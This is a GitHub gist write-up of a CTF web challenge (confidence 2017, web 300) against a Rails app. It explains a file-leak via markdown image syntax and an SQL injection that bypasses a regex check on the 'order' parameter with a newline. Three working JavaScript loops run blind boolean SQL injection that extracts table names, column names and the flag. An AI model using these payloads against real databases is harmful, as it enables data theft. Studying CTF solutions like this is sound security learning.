Skip to content

Instantly share code, notes, and snippets.

@junorouse
Last active April 24, 2017 05:53
Show Gist options
  • Save junorouse/50ecf77d8c2ab2a98c3ad848c9e2c996 to your computer and use it in GitHub Desktop.
Save junorouse/50ecf77d8c2ab2a98c3ad848c9e2c996 to your computer and use it in GitHub Desktop.
confidence 2017 web 300 write up

vulnerability

  1. ![xxx](filename) can leak any file (if knows the file name)

the server uses ROR (ruby on rails), so in ROR docs there are controller file name in standardization. apps/controllers/name_controller.rb so I leaked users_controller.rb and notes_controller.rb.

  1. in notes_controller there is an sqli vuln.
def order
    order = params[:order]
    if order =~ /^(created_at|updated_at|title)$/
      order
    else
      'created_at'
    end
  end

if order =~ /^(created_at|updated_at|title)$/ can bypass via 0xa (\n).

exploit

leak table name

for (var i=32; i<=127; i++) {
	$.ajax({
		type: 'get',
		url: "http://derailed.hackable.software/notes?order=title%0A%7C%7CCASE%20WHEN%20ascii(substr((select%20table_name%20from%20information_schema.columns%20where%20table_schema%20=%20%27public%27 and table_name!='notes'%20and table_name!='users' and table_name!='ar_internal_metadata' and table_name!='schema_migrations' limit 1),4,1))%3D"+i+"%20THEN%201%20ELSE%20(select%201%20union%20select%202)%20END",
		success: function(e, x, f) {
			console.log(f.getAllResponseHeaders());
		}
	})
}

leak column name

for (var i=32; i<=127; i++) {
	$.ajax({
		type: 'get',
		url: "http://derailed.hackable.software/notes?order=title%0A%7C%7CCASE%20WHEN%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema%20=%20%27public%27 and table_name='fl4g' limit 1),1,1))%3D"+i+"%20THEN%201%20ELSE%20(select%201%20union%20select%202)%20END",
		success: function(e, x, f) {
			console.log(f.getAllResponseHeaders());
		}
	})
}

get flag (select F1A6 from fl4g didn't work so I used asterisk)

for (var i=32; i<=127; i++) {
	$.ajax({
		type: 'get',
		url: "http://derailed.hackable.software/notes?order=title%0A%7C%7CCASE%20WHEN%20ascii(substr((select * from fl4g),9,1))="+i+"%20THEN%201%20ELSE%20(select%201%20union%20select%202)%20END",
		success: function(e, x, f) {
			console.log(f.getAllResponseHeaders());
		}
	})
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment